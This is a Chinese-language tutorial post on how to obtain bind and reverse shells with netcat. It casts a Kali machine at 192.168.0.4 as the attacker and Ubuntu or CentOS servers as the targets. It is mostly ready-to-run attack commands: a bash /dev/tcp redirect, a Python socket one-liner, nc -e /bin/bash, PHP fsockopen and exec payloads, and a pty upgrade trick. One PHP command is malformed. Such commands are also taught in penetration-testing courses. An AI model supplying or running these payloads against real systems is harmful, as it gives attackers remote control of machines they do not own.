您好,登錄后才能下訂單哦!
這篇文章給大家分享的是有關(guān)NC如何反彈shell的內(nèi)容。小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,一起跟隨小編過來看看吧。
假如ubuntu、CentOS為目標(biāo)服務(wù)器系統(tǒng)
kali為攻擊者的系統(tǒng),ip為:192.168.0.4,開放7777端口且沒被占用
最終是將ubuntu、CentOS的shell反彈到kali上
正向反彈shell
ubuntu或者CentOS上面輸入
nc -lvp 7777 -e /bin/bash
kali上輸入
nc ip 7777
正向反彈是目標(biāo)機(jī)先執(zhí)行nc命令,然后kali上再進(jìn)行nc監(jiān)聽,即可反彈shell。
需要目標(biāo)機(jī)安裝nc。
反向反彈shell
方法1:bash反彈
bash -i >& /dev/tcp/ip/port 0>&1
但首先需要在kali上使用nc監(jiān)聽端口:
nc -lvp 7777
此方法在ubuntu下不會(huì)反彈成功,CentOS可以反彈成功。
方法2:python反彈
反彈shell的命令如下:
代碼如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
首先,使用nc在kali上監(jiān)聽端口:
nc -lvp 7777
在CentOS或者ubuntu下使用python去反向連接,輸入:
代碼如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
此方法ubuntu和Linux均反彈成功。
方法3
首先在kali上輸入nc監(jiān)聽:
nc -lvp 7777
在CentOS或者ubuntu 上使用nc去反向連接,命令如下:
nc -e /bin/bash 192.168.0.4 7777
方法4:php反彈shell
首先在kali上輸入:
nc -lvp 7777
然后在目標(biāo)機(jī)上輸入:
php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'
或
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
注意php反彈shell的這些方法都需要php關(guān)閉safe_mode這個(gè)選項(xiàng),才可以使用exec函數(shù)。
遇到反彈后不是正常的shell,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")'
轉(zhuǎn)化為常規(guī)的shell。
感謝各位的閱讀!關(guān)于“NC如何反彈shell”這篇文章就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,讓大家可以學(xué)到更多知識(shí),如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到吧!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。